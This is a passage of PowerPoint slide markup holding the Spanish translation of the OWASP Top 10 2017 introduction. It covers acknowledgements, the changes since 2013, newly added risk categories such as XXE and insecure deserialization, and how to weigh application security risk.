                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>testers</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 de aplicaciones sobre qué verificar.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Utilice las herramientas sabiamente.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Las vulnerabilidades pueden ser bastante complejas y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estar profundamente ocultas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en el código. En muchos casos, el enfoque más eficaz en función de los costos, para encontrar y eliminar esas debilidades es recurrir a expertos dotados de herramientas avanzadas. Confiar sólo en las herramientas proporciona una falsa sensación de seguridad y no es recomendable,</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="1" baseline="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Izquierda, derecha y hacia todas partes.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Enfóquese en hacer de la seguridad una parte integral de la cultura en desarrollo en su organización. Obtenga más información en </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Modelo de Madurez de Aseguramiento del Software de OWASP (SAMM)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="9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2953063268"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="4097906"/>
          <a:ext cx="3429000" cy="579251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es-AR" sz="1350" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Contribución</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-AR" sz="135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pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Quisiéramos agradecer a las organizaciones que contribuyeron con sus datos de vulnerabilidades para respaldar la actualización de 2017. Recibimos más de 40 respuestas a nuestra solicitud de información. Por primera vez, todos los datos que contribuyeron a esta publicación del Top 10, así como la lista completa de colaboradores, están a disposición del público. Creemos que esta es una de las colecciones de datos sobre vulnerabilidades más grandes y diversas que se hayan recopilado de forma pública.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pP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Como hay más colaboradores que espacio, hemos creado una </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página dedicada a reconocer estas contribuciones</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Deseamos </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>agradecer sinceramente a</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estas organizaciones por estar dispuestas a compartir públicamente sus datos sobre vulnerabilidades. Esperamos que esto continúe creciendo y aliente a más organizaciones a hacer lo mismo. Posiblemente esta publicación sea vista como uno de los hitos clave de la seguridad basada en evidencia. El OWASP Top 10 no sería posible sin estas increíbles contribuciones</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Un especial agradecimiento a las más de 500 personas que se tomaron el tiempo para completar la encuesta dirigida a la industria. Su opinión ayudó a determinar dos nuevas incorporaciones al Top 10. Los comentarios adicionales, notas de aliento y críticas fueron muy valiosos. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>También nos </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gustaría</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> agradecer a aquellas personas que contribuyeron con comentarios constructivos y tiempo para revisar la presente actualización del Top 10. En la medida de lo posible, los hemos incluido en la página de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16" action="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>Agradecimientos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Y finalmente, agradecemos a todos los traductores por ayudar a hacer el OWASP Top 10 más accesible para todos.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s-AR" noProof="0" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" noProof="0" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Introducción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26978074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s-AR" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>¿Qué ha cambiado de 2013 a 2017?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" i="0" u="none" strike="noStrike" noProof="0"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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pP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Los cambios se han acelerado en los últimos cuatro años, y OWASP Top 10 necesitaba actualizarse. Hemos rediseñado completamente el OWASP Top 10, mejorado la metodología, utilizado un nuevo proceso de obtención de datos, trabajamos con la comunidad, reordenamos los riesgos y los reescribimos desde cero, y agregamos referencias a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frameworks</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y lenguajes que son utilizados actualmente</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pP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 los últimos años, la tecnología base y la arquitectura de las aplicaciones ha cambiado significativamente:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pP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Los microservicios escritos en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node.js </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Spring Boot </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están reemplazando las aplicaciones monolíticas tradicionales. Los microservicios vienen con sus propios desafíos de seguridad, incluyendo el establecimiento de confianza entre microservicios, contenedores, gestión de secretos, etc. El antiguo código, que nunca esperó ser accesible desde Internet, se encuentra ahora detrás de un API o servicio RESTful, esperando a ser consumido por aplicaciones de una sola página (SPAs) y aplicaciones móviles. Las suposiciones arquitectónicas del código, como las llamadas confiables, ya no son válidas.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pP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Las aplicaciones de una sola página, escritas en </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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frameworks</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como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Angular</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y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React</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permiten la creación de interfaces de usuario altamente modulares con múltiples características. Las funcionalidades en el lado del cliente que tradicionalmente se han implementado en el servidor, traen consigo sus propios desafíos de seguridad.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pP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es ahora el lenguaje principal de la web, con node.js ejecutando el lado del servidor y los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frameworks</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web modernos como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Bootstrap</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Electron</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Angular</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y </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" i="1"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React</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR"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ejecutándose en el cliente</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="90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gn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR"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Nuevos riesgos, respaldados en datos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR"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A4:2017 – Entidades Externas XML (XXE)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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es una nueva categoría, respaldada principalmente por los resultados obtenidos de las herramientas de análisis estático de código (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" dirty="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>SAST</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buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR"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Nuevos riesgos, respaldados por la comunidad</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US"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0" lvl="0" indent="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>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Le pedimos a la comunidad que nos proporcionara información sobre dos categorías de debilidades. Luego de más de 500 envíos, y de eliminar los problemas que ya estaban respaldados por datos (tales como Exposición a Datos Sensibles y XXE), los dos nuevos riesgos son:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR"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A8:2017 – Deserialización Insegura</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que permite la ejecución remota de código o la manipulación de objetos sensibles en la plataforma afectada.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR"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 – Registro y Monitoreo Insuficientes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la falta de estos aspectos puede impedir o demorar en forma significativa la detección de actividad maliciosa o de sustracción de datos, la respuesta a los incidentes y la investigación forense digital.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr lvl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR"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Fusionados o retirados, pero no olvidados:</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-AR" sz="900" dirty="0">
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="1"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A4 – Referencia Directa Insegura a Objetos y A7 – Ausencia de Control de Acceso a las Funciones</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fueron fusionados en </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="1"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ction="ppaction://hlinksldjump"/>
                        </a:rPr>
                        <a:t>A5:2017 – Pérdida de Control de Acceso</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171450" lvl="0" indent="-171450" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="1"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A8 – Falsificación de Peticiones en Sitios Cruzados (CSRF)</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dado que varios </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="0" i="1"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Frameworks</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incluyen </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defensas contra CSRF</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sólo se encontró en el 5% de las aplicaciones.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="171450" lvl="0" indent="-171450" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="900" b="1"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A10 – Redirecciones y reenvíos no validados</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s-AR" sz="900" b="1"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s-AR" sz="900" b="0" i="0" u="none" strike="noStrike" kern="12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mientras que se encuentra en aproximadamente el 8% de las aplicaciones, fue superado ampliamente por XXE.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-82550" algn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="000000"/>
                        </a:buClr>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" kern="1200" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>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s-AR" noProof="0" dirty="0"/>
              <a:t>RN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" noProof="0" dirty="0">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Notas sobre la versión</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43CD1E63-DB53-4DE8-8AAF-1FBFCD63E7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25" y="6213140"/>
            <a:ext cx="6851337" cy="369452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146403007"/>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s-AR" sz="1600" b="1" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>¿Cuáles son los riesgos en seguridad de aplicaciones?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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="10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Los atacantes pueden, potencialmente, utilizar diferentes rutas a través de su aplicación para perjudicar su negocio u organización. Cada uno de estos caminos representa un riesgo que puede o no ser suficientemente grave como para merecer atención.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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endParaRPr lang="es-AR"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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="10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Algunas veces, estos caminos son fáciles de encontrar y explotar, mientras que otras son extremadamente difíciles. De la misma manera, el perjuicio ocasionado puede no tener consecuencias, o puede dejarlo en la quiebra. A fin de determinar el riesgo para su organización, puede evaluar la probabilidad asociada a cada agente de amenaza, vector de ataque, debilidad de seguridad y combinarlo con una estimación del impacto técnico y de negocio para su organización. Juntos, estos factores determinan su riesgo general</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1583796"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sz="3600" noProof="0" dirty="0"/>
              <a:t>Risk</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Title 62"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583796" y="75600"/>
            <a:ext cx="5274204" cy="738000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-AR" noProof="0" dirty="0"/>
              <a:t>Riesgos en la Seguridad de las Aplicaciones</a:t>
            </a:r>
            <a:endParaRPr lang="es-AR" noProof="0"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227505328"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-1" y="5268034"/>
          <a:ext cx="4824155" cy="4637966"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="4824155">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="337493">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1600" b="1" noProof="0" dirty="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>¿Cuál es mi Riesgo?</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-AR"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ct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>El </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR"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s-AR" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> se enfoca en identificar los riesgos más críticos para un amplio tipo de organizaciones. Para cada uno de estos riesgos, se proporciona información genérica sobre la probabilidad y el impacto técnico, utilizando el siguiente esquema de evaluación, basado en la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>Metodología de Evaluación de Riesgos de OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-AR" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans"/>
